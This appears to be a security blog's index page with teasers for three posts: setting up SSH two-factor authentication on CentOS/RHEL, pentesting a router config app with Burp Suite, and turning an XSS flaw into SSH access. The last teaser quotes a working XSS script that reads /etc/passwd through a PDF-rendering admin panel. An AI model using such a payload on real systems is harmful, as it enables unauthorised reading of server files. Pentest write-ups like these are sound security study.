Configure SSH Google Two factor (2FA) Authentication on CentOS / RHEL

Mohad Educational September 11, 2023
Lets make short and clean ! Step 1: Install sudo yum -y install google-authenticator qrencode Step 2: Configuring SSH Server $ sudo vi /etc/pam.d/sshd auth required pam_google_authenticator.so $ sudo /etc/ssh/sshd_config ChallengeResponseAuthentication yes Step 3: Configuring…
Read More

Pentest router Apk and get ssh access over host

Mohad Pentest July 18, 2022
out of the b0x 😉   downloaded a router online config apk , run it on LD Player and activated burp suite . checking the request :     sent it to repeater and  ..…
Read More

Pentest XSS Attack To SSH

Mohad Pentest July 18, 2022
Situation :  Admin Panel infected with xss and uploading any file converted to pdf.   P0c from (https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html): <script> x=new XMLHttpRequest; x.onload=function() { document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script>   Explaining it in images: Next Download…
Read More